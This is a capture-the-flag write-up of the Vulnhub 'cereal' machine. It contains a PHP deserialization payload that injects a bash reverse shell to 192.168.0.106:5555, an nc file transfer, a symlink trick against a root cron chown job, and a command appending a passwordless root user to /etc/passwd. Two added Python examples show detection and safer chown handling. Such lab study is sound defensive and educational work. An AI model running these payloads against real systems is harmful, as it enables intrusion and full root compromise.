Vulnhub's cereal
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
I. Host discovery
II. Port scanning
III. Service version detection
IV. Port analysis
1. 21 ftp
Port 21 is open and runs ftp, which is also the default ftp port. From the banner we learn the ftp server's IP, and also that anonymous login is allowed.
2. 22, 80
The common services ssh and http are open.
3. 139, 445, 3306
139 and 445 usually host the smb service, just over different protocols.
3306 is the common mysql port. Here it shows that connections are allowed.
4. Other ports
As for the remaining ports, apart from 44441, which runs an http service, there is not much useful information; the services could not be identified.
V. Information gathering
1. 80
The main page yielded nothing.
Source code: no interfaces, hidden directories or leaked source were found. No gain.
2. 44441
Nothing more here.
VI. Directory brute-forcing
1. 80
(1) Default dictionary
Scanning directly in dir mode with the default common.txt found these directories.
There is a wordpress login page (judging from the other links); trying weak passwords did not work.
(2) /blog
There is domain name information here, and a mention of a backup.
(3) phpinfo
From it we learn some interface details, configuration information and the server-side language runtime (php).
2. 44441
No useful information here.
3. Switch to a larger dictionary and rerun
Still no more information.
VII. Binding the domain name
Visiting it turns out to show the Apache default page. Try brute-forcing directories under this domain name; according to the hint there should be a backup file, but after a lot of running, still nothing.
1. 80
2. 44441
VIII. gobuster subdomain brute-forcing
gobuster vhost -u http://cereal.ctf:44441 -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
A subdomain is found here.
IX. secure.cereal.ctf
After binding the IP and host in the hosts file and visiting it, port 80 shows the same main page as before.
On port 44441 this is what is deployed.
X. Breaking in
1. Function
This is an interface that performs a ping, and it calls the operating system's ping command.
2. Command injection
Tried with | && ;
The attempts failed.
3. Packet capture and decoding
Obviously this is PHP serialized data. To exploit the deserialization we first have to determine whether a deserialization vulnerability exists at all, and that can only be decided by auditing the code; only then can the payload be constructed.
4. dirbuster brute-forcing the backup file
(1) The backup may be a version-control directory
.svn .git
The attempt failed.
(2) Backup directory brute-force
As a result there is a back_en path; this is the backup file path.
(3) Backup file
Choose common.txt under seclists to brute-force; a 200 response is the normal state.
XI. Downloading and auditing the backup files
1. The index.php.bak file
This is the back-end code.
XII. Constructing the payload
Find an online PHP sandbox to run this:
<?php
// Build the serialized pingTest object the ping endpoint expects and URL-encode it.
class pingTest {
    public $ipAddress = "192.168.0.106";
    public $isValid = true;
}
$obj = new pingTest;
$serialized = serialize($obj);
echo urlencode($serialized);
?>
XIII. Attempting injection
1. Normal ping command
2. RCE via deserialization
In the page source you can see that the id command executed successfully.
3. Reverse shell
bash -i >& /dev/tcp/192.168.0.106/5555 0>&1
<?php
// Same object as before, with the reverse shell appended to the ipAddress field.
class pingTest {
    public $ipAddress = "192.168.0.106;bash -i >& /dev/tcp/192.168.0.106/5555 0>&1 ";
    public $isValid = true;
}
$obj = new pingTest;
$serialized = serialize($obj);
echo urlencode($serialized);
?>
Broke through the perimeter; the reverse shell connected:
XIV. pspy captures the scheduled task: privilege escalation
Summary: in earlier study we learned many privilege escalation techniques: kernel vulnerabilities, suid privilege inheritance, sudo permission configuration, motd injection, buffer overflows, exploiting unauthenticated redis, writing a public key through mysql. None of these work here.
1. pspy process monitoring tool
Overview: this tool can be run by an ordinary user and monitors the processes spawned by root, so we can look for a process that can be leveraged for privilege escalation.
Because the target is 64-bit, we download the 64-bit build.
2. Transfer via nc
nc -nvlp 4444 > pspy
nc 192.168.0.104 4444 < pspy64 -w 1
3. Run pspy
First grant execute permission, then run it.
Now we have everything in view; it has to be said that this tool is a gem for system troubleshooting.
4. chown.py
We found an unusual file; let's analyze it.
5. Permission analysis
Owner and group are both root, and we can read it.
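The serialized pingTest object travels URL-encoded in the request, so it can be checked before it ever reaches unserialize(). The following is an added example, not code from the writeup or from the box: it pulls the string properties out of the PHP-serialized object using the length prefixes and flags any ipAddress that is not a literal IP, which is how the id payload above would be caught in a request log. The class and property names come from the writeup; the three request bodies are constructed.

```python
import ipaddress
import re
from urllib.parse import quote, unquote

# Constructed request bodies in the form the ping endpoint receives them: the
# serialized pingTest object from the writeup, URL-encoded as urlencode() does.
BENIGN_REQUEST = quote(
    'O:8:"pingTest":2:{s:9:"ipAddress";s:13:"192.168.0.106";s:7:"isValid";b:1;}', safe="")
INJECTED_REQUEST = quote(
    'O:8:"pingTest":2:{s:9:"ipAddress";s:16:"192.168.0.106;id";s:7:"isValid";b:1;}', safe="")
BAD_HOST_REQUEST = quote(
    'O:8:"pingTest":2:{s:9:"ipAddress";s:9:"localhost";s:7:"isValid";b:1;}', safe="")

_STR_TOKEN = re.compile(rb's:(\d+):"')
SHELL_META = ";|&`$\n"

def php_string_fields(serialized):
    """Return the string-valued properties of a PHP-serialized object as a dict.
    Each s:N:"..." token is read using its byte length N, so a ';' or '"' inside a
    value cannot desynchronise the scan. Non-string values (b:, i:, N) are skipped."""
    data = serialized.encode("utf-8")
    fields, pos, key = {}, 0, None
    while (m := _STR_TOKEN.search(data, pos)):
        n = int(m.group(1))
        value = data[m.end():m.end() + n].decode("utf-8", errors="replace")
        pos = m.end() + n + 2                       # step over the closing '";'
        if key is None:
            key = value
            if not data.startswith(b"s:", pos):     # value is not a string: drop the key
                key = None
        else:
            fields[key] = value
            key = None
    return fields

def classify(request_body):
    """Verdict for one request: ('ok' | 'command-injection' | 'invalid-ip', ipAddress).
    The only safe value for a field handed to the system ping is a literal IP."""
    ip = php_string_fields(unquote(request_body)).get("ipAddress", "")
    try:
        ipaddress.ip_address(ip)
        return ("ok", ip)
    except ValueError:
        pass
    if any(c in ip for c in SHELL_META):
        return ("command-injection", ip)
    return ("invalid-ip", ip)
```

The same validation (filter_var with FILTER_VALIDATE_IP before the field is used) is what the endpoint itself should do; a check on the serialized blob only tells you after the fact.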
6. Reading the script source
The script changes the owner and group of every file under the folder below to rocky:apache. Since we are currently in the apache group, we can place a link to /etc/passwd in that folder and thereby change the owner and group of /etc/passwd itself.
7. Changing owner and group through a symbolic link
The ln parameter -f:
-f forces ln to replace any existing destination path. If the destination path already exists and -f is not specified, ln does not create the new link; instead it writes a diagnostic message to standard error and continues linking the remaining SourceFiles.
8. A ten-minute wait
You can see that the file's ownership has been changed.
9. Append a root user
echo "mhq::0:0:root:/root:/bin/bash" >> /etc/passwd
Privilege escalation succeeded.
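The chown.py job is dangerous because it trusts whatever the apache-writable folder contains and follows links out of it. As an added example (not the box's script), here is how such a root-run job would walk the folder safely: lstat so symbolic links are never followed, hard links and anything whose real path leaves the folder are skipped, and ownership is changed through a descriptor opened with O_NOFOLLOW so a link swapped in after the check still cannot redirect the chown. The layout built in demo() is constructed, with a temporary file standing in for /etc/passwd.

```python
import os
import stat
import tempfile

def safe_chown_targets(root):
    """Paths under root that a root-run chown job may touch: regular files and
    directories that are not symlinks, not hard links, and whose real path is
    still inside root. A symlink named passwd pointing at /etc/passwd is skipped."""
    root_real = os.path.realpath(root)
    targets = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                      # lstat: the link itself, never its target
            if stat.S_ISLNK(st.st_mode):
                continue
            if stat.S_ISREG(st.st_mode) and st.st_nlink > 1:
                continue                             # hard link: the inode may live outside root
            if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
                continue                             # devices, sockets, fifos
            if os.path.commonpath([root_real, os.path.realpath(path)]) != root_real:
                continue
            targets.append(path)
    return targets

def chown_nofollow(path, uid, gid):
    """Change ownership via a descriptor opened with O_NOFOLLOW, so a symlink
    swapped in between the check above and this call makes open() fail (ELOOP)
    instead of redirecting the chown."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        os.fchown(fd, uid, gid)
    finally:
        os.close(fd)

def demo():
    """Constructed layout: a tree with one real file and one symlink named
    'passwd' that points at a stand-in for /etc/passwd outside the tree."""
    base = tempfile.mkdtemp()
    standin = os.path.join(base, "passwd-standin")   # plays the role of /etc/passwd
    open(standin, "w").close()
    root = os.path.join(base, "tree")
    os.mkdir(root)
    real_file = os.path.join(root, "report.txt")
    open(real_file, "w").close()
    link = os.path.join(root, "passwd")
    os.symlink(standin, link)
    return safe_chown_targets(root), real_file, link
```

demo() returns only report.txt as a target; the passwd link is never considered, so the root job can no longer be steered onto /etc/passwd.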